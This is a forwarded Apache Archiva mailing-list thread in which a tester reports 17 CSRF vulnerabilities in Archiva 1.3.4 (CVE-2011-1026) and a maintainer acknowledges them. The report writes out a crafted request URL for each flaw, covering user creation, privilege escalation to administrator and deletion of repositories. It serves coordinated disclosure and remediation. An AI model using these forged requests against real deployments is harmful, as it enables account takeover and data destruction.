Please be aware of the security vulnerabilities below that was reported in the dev list. We're already working on the fix and will release the fix as soon as possible.
Thanks, Deng ---------- Forwarded message ---------- From: Deng Ching <och...@apache.org> Date: Tue, Mar 1, 2011 at 11:25 AM Subject: Re: FW: Multiple CSRF issues in Archiva 1.3.4 To: d...@archiva.apache.org Cc: Walikar Riyaz Ahemed Dawalmalik <walikarriya...@microland.com> Thanks for reporting this, however, it should have been sent/reported to security@ first. I've forwarded this to the correct list and the CVE-ID is CVE-2011-1026. The CSRF issues aren't considered absolutely critical but we're already working on the fix and will schedule another release as soon as possible. -Deng On Mon, Feb 28, 2011 at 3:31 PM, Walikar Riyaz Ahemed Dawalmalik <walikarriya...@microland.com> wrote: > Hi, > > The latest version of Archiva (1.3.4) is also vulnerable to multiple > CSRF issues. The following are the details and exploit code. Please > confirm this mail and revert with an update. I will be disclosing this > to the security community after the issues have been fixed. > > Project: Archiva > Severity: Critical > Versions: 1.3.4 (other versions may be affected) > Exploit type: Multiple CSRF > > CSRF: > > An attacker can build a simple html page containing a hidden Image tag > (eg: <img src=vulnurl width=0 height=0 />) and entice the administrator > to access the page resulting in the following issues: > > 1. An attacker can create a new user using the administrator's session: > http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use > rname=tester123&user.fullName=test&user.email=test%40test.com&user.passw > ord=abc&user.confirmPassword=abc > > 2. An attacker can delete a user: > http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username > =test > > 3. An attacker can elevate privileges of accounts: > http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t > est&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a > ddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato > r&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel > ectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos > itory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s > ubmitRolesButton=Submit > > 4. An attacker can delete the Configuration and contents along with the > repository: > http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&; > method%3AdeleteContents=Delete+Configuration+and+Contents > > 5. An attacker can delete an artifact from any repository: > http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a > rtifactId=1&version=1&repositoryId=snapshots > > 6. An attacker can add a Repository Group: > http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository > Group.id=csrfgrp > > 7. An attacker can delete a repository Group: > http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro > upId=test&method%3Adelete=Confirm > > 8. An attacker can disable Proxy connectors: > http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action > ?target=maven2-repository.dev.java.net&source=internal > > 9. An attacker can Delete proxy connectors: > http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t > arget=maven2-repository.dev.java.net&source=snapshots > > 10. An attacker can delete Legacy Artifact Path under Legacy Support: > http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path > =jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar > > 11. An attacker can create a New Network Proxy configuration: > http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro > xy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us > ername=&proxy.password= > > 12. An attacker can delete an existing network proxy configuration: > http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro > xyid=myproxy > > 13. An attacker can add custom file extensions to the repository > scanning page: > http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter > n.action?pattern=**%2F*.rum&fileTypeId=artifacts > > 14. An attacker can remove an existing file extension from the > repository scanning page: > http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat > tern.action?pattern=**%2F*.rum&fileTypeId=artifacts > > 15. An attacker can change the settings on the Known Consumers section: > http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum > ers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC > onsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu > ms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume > rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable > dKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v > alidate-checksums > > 16. An attacker can enable/disable Unprocessed Consumer settings: > http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers. > action?enabledUnprocessedConsumers=update-db-project > > 17. An attacker can change settings on the Cleanup Consumers section: > http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti > on?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup > Consumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres > ent-remove-indexed > > > I would request you to provide CVE-IDs for the vulnerabilities so that I > can co-ordinate a full disclosure after these issues are fixed. > > Warm Regards, > Riyaz Ahemed Walikar || Senior Engineer - Professional Services > Vulnerability Assessment & Penetration Testing > Mobile: +91-98860-42242 || Extn: 5601 > > > The information transmitted is intended only for the person or entity to > which it is addressed and may contain confidential and/or privileged material. > Any review, re-transmission, dissemination or other use of or taking of any > action in reliance upon,this information by persons or entities other than > the intended recipient is prohibited. > If you received this in error, please contact the sender and delete the > material from your computer. > Microland takes all reasonable steps to ensure that its electronic > communications are free from viruses. > However, given Internet accessibility, the Company cannot accept liability > for any virus introduced by this e-mail or any attachment and you are advised > to use up-to-date virus checking software. > >
